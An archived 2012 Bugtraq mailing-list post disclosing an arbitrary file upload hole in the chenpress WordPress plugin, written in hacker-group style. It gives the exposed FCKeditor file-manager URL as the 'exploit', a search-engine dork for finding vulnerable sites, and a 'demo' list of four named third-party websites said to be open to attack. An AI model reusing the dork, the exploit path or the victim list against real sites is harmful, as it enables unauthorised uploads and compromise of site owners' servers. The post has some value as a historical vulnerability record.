[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <201207210750.q6L7osp7012647@sf01web1.securityfocus.com>
Date: Sat, 21 Jul 2012 07:50:54 GMT
From: Amir@...st.ir
To: bugtraq@...urityfocus.com
Subject: Wordpress (chenpress Plugin) Arbitrary File Upload Vulnerability
a bug in Wordpress (chenpress Plugin) that allows to us to occur
a File Upload on a Remote machin.
########################################################################################
#
# Exploit Title : Wordpress (chenpress Plugin) Arbitrary File Upload Vulnerability
#
# Author : IrIsT.Ir
#
# Discovered By : Am!r
#
# Home : http://IrIsT.Ir/forum
#
# Software Link : http://wordpress.org
#
# Security Risk : High
#
# Version : All Version
#
# Tested on : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork : inurl:"wp-content/plugins/chenpress"
#
########################################################################################
#
# Expl0iTs :
#
# http://target.com/wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
#
#
# D3mo :
#
# butcherboysonline.com/wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
#
# atletismosuanzes.com/wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/default/browser.html
#
# carnadas.org/blog/wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/default/browser.html
#
# downtheaisle.ca/wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/default/browser.html
#
########################################################################################
#
# Greats : B3HZ4D - Crim3R - nimaarek - 0x0ptim0us - R3ZA BLACK HAT - TaK.FaNaR - m3hdi - F@rid
#
# H4x0r - dr.tofan - skote_vahshat - d3c0d3r - Dr.Security - Mr.Xpr - Bl4ck_king - hellboy
#
# Siamak_Black - Shekaf & All Members In IrIsT.Ir
#
########################################################################################
Powered by blists - more mailing lists